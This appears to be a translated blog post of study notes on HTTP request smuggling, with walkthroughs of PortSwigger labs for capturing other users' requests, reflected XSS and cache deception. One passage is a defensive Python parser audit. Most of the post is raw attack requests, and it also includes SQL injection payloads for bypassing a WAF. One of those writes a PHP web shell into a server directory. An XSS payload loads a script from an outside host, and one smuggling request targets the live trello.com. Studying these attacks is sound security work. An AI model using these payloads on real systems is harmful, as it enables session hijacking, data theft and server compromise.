  • HTTP request smuggling: account hijacking and WAF bypass

    Reference links (may need a VPN to access):
    https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn
    https://medium.com/@cc1h2e1/write-up-of-two-http-requests-smuggling-ff211656fe7d


    Transfer-Encoding: chunked

    POST / HTTP/1.1
    Host: ningfeng.com
    Content-Type: application/x-www-form-urlencoded
    Transfer-Encoding: chunked

    b    (chunk size: 11 in decimal, b in hex)
    q=smuggling
    6
    hahaha
    0

    A clever use of Transfer-Encoding
    Bypassing a WAF with chunked encoding (the payloads that were split into chunks):
    id=1
    id=1 union select 1,2,table_name,4 from information_schema.tables where table_schema='yzm'
    id=1 union select 1,2,username,password from user
    id=1 union select 1,2,column_name,4 from information_schema.columns where table_schema='yzm' and table_name='user'
    union select 1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4
    id=1 union select 1,2,username,password from user union select 1,2,3,'<?php phpinfo()?>' into outfile "C:/phpStudy/PHPTutorial/WWW/shell1.php"%23

    CL.TE smuggling
    https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
    --------
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 6
    Transfer-Encoding:chunked

    0

    A

    TE.CL smuggling
    https://portswigger.net/web-security/request-smuggling/lab-basic-te-cl
    -------
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 3
    Transfer-Encoding: chunked

    8
    SMUGGLED
    0

    TE.TE smuggling (obfuscated Transfer-Encoding header)
    https://portswigger.net/web-security/request-smuggling/lab-obfuscating-te-header
    ------
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 3
    Transfer-encoding: chunked
    Transfer-encoding: cow

    8
    SMUGGLED
    0
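The three variants above (and the chunked body shown earlier) all come down to two parsers disagreeing on where a request body ends. As an added example that is not part of the original post, the following strict framing audit shows what a front-end should reject and how many bytes each view leaves unread on the connection; the sample requests are constructed, and the host name is a placeholder.

```python
# Added example, not from the original post; the sample requests below are constructed.
CL_TE = (b"POST / HTTP/1.1\r\nHost: example.test\r\nContent-Length: 6\r\n"
         b"Transfer-Encoding: chunked\r\n\r\n0\r\n\r\nG")
TE_TE = (b"POST / HTTP/1.1\r\nHost: example.test\r\nContent-Length: 3\r\n"
         b"Transfer-encoding: chunked\r\nTransfer-encoding: cow\r\n\r\n"
         b"8\r\nSMUGGLED\r\n0\r\n\r\n")

def parse_request(raw):
    """Split a raw request into (request line, [(lower-cased name, raw value)], body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.append((name.strip().lower(), value))  # raw value keeps tabs etc.
    return lines[0], headers, body

def decode_chunked(body):
    """Decode a chunked body; return (payload, bytes consumed). Trailers are assumed absent."""
    out, pos = b"", 0
    while True:
        end = body.index(b"\r\n", pos)
        size = int(body[pos:end].split(b";")[0], 16)  # ignore chunk extensions
        pos = end + 2
        if size == 0:
            return out, body.index(b"\r\n", pos) + 2  # consume the final CRLF
        out += body[pos:pos + size]
        pos += size + 2  # chunk data plus its CRLF

def audit(raw):
    """Return (framing problems to reject on, bytes each parser view leaves unread)."""
    _, headers, body = parse_request(raw)
    cl = [v for n, v in headers if n == b"content-length"]
    te = [v for n, v in headers if n == b"transfer-encoding"]
    problems = []
    if cl and te:
        problems.append("Content-Length and Transfer-Encoding both present")
    if len(te) > 1:
        problems.append("duplicate Transfer-Encoding headers")
    for v in te:  # only an exactly canonical value is safe to forward
        if v.strip(b" ").lower() != b"chunked":
            problems.append("non-canonical Transfer-Encoding value %r" % v)
    leftover = {}
    if cl:
        leftover["after_CL"] = body[int(cl[0].strip()):]
    if te:
        _, used = decode_chunked(body)
        leftover["after_TE"] = body[used:]
    return problems, leftover
```

A non-empty `leftover` entry that differs between the two views is exactly the prefix that gets prepended to the next request on a shared back-end connection; a proxy that sees any entry in `problems` should close the connection instead of forwarding.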

    1. Practical exploitation: using smuggling to hijack accounts (capturing other users' requests)
    https://portswigger.net/web-security/request-smuggling/exploiting/lab-capture-other-users-requests

    POST / HTTP/1.1
    Host: acea1f901e2e1cad80e665da0052003e.web-security-academy.net
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Referer: https://portswigger.net/web-security/request-smuggling/exploiting/lab-capture-other-users-requests
    Connection: close
    Cookie: session=8OpNIpcPROeJCh4NTKrKdswvL3UVLcZ7
    Upgrade-Insecure-Requests: 1
    Cache-Control: max-age=0
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 466
    Transfer-encoding: chunked

    0


    POST /post/comment HTTP/1.1
    Host: acea1f901e2e1cad80e665da0052003e.web-security-academy.net
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 800
    Connection: close
    Cookie: session=8OpNIpcPROeJCh4NTKrKdswvL3UVLcZ7

    csrf=JysTwJjScrQNCUPsyWbZMwwMKlpltaCU&postId=3&name=guocool&email=4513641%40qq.com&website=https%3A%2F%2Fwww.baidu.com&comment=aaa

    2. Practical exploitation: using smuggling to "upgrade" a reflected XSS
    https://portswigger.net/web-security/request-smuggling/exploiting/lab-deliver-reflected-xss

    POST / HTTP/1.1
    Host: ac321f5c1edb914d80ec24bd00760018.web-security-academy.net
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Connection: close
    Cookie: session=U4uy6HF2ysWgo9x3puFV5tWfJghUCzY9
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 457
    Transfer-encoding: chunked

    0


    GET /post?postId=4 HTTP/1.1
    Host: ac321f5c1edb914d80ec24bd00760018.web-security-academy.net
    User-Agent: "><script/src=//15.rs></script>#
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Referer: https://ac321f5c1edb914d80ec24bd00760018.web-security-academy.net/
    Connection: close
    Cookie: session=U4uy6HF2ysWgo9x3puFV5tWfJghUCzY9
    Notes:
    First capture the home page request, then place the smuggled request inside that home page request, and finally capture the home page again to see whether the XSS fired; if it did, visiting the home page once more will show the reflected XSS.

    Additional point:
    3. Practical exploitation: using smuggling to perform web cache deception (the lab credentials are: carlos / montoya)
    https://portswigger.net/web-security/request-smuggling/exploiting/lab-perform-web-cache-deception

    POST / HTTP/1.1
    Host: ac3e1f611ffb77d4803f429c00a200c3.web-security-academy.net
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Referer: https://portswigger.net/web-security/request-smuggling/exploiting/lab-perform-web-cache-deception
    Connection: close
    Cookie: session=bPdxgrOnPdSMS5P7CzEX5SpaN3jA46Pl
    Upgrade-Insecure-Requests: 1
    Cache-Control: max-age=0
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 39
    Transfer-encoding: chunked

    0


    GET /my-account HTTP/1.1
    Foo: X
    Note: request the image URL repeatedly; if it does not work the first time, a few more attempts will get you the API key.


    The main event:
    Finding request smuggling on Trello
    POST /1/cards HTTP/1.1
    Host:trello.com
    Transfer-Encoding: [tab] chunked
    Content-Length:4

    9f    (chunk size: hex 9f = 159 in decimal)

    PUT /1/members/1234 HTTP/1.1
    Host: trello.com
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 400

    x=x&csrf=1234&username=testzzz&bio=cake
    0

    GET / HTTP/1.1
    Host: trello.com


    Bonus (needs a VPN to view): https://medium.com/@cc1h2e1/write-up-of-two-http-requests-smuggling-ff211656fe7d

  • Original article: https://www.cnblogs.com/coolguo/p/14216080.html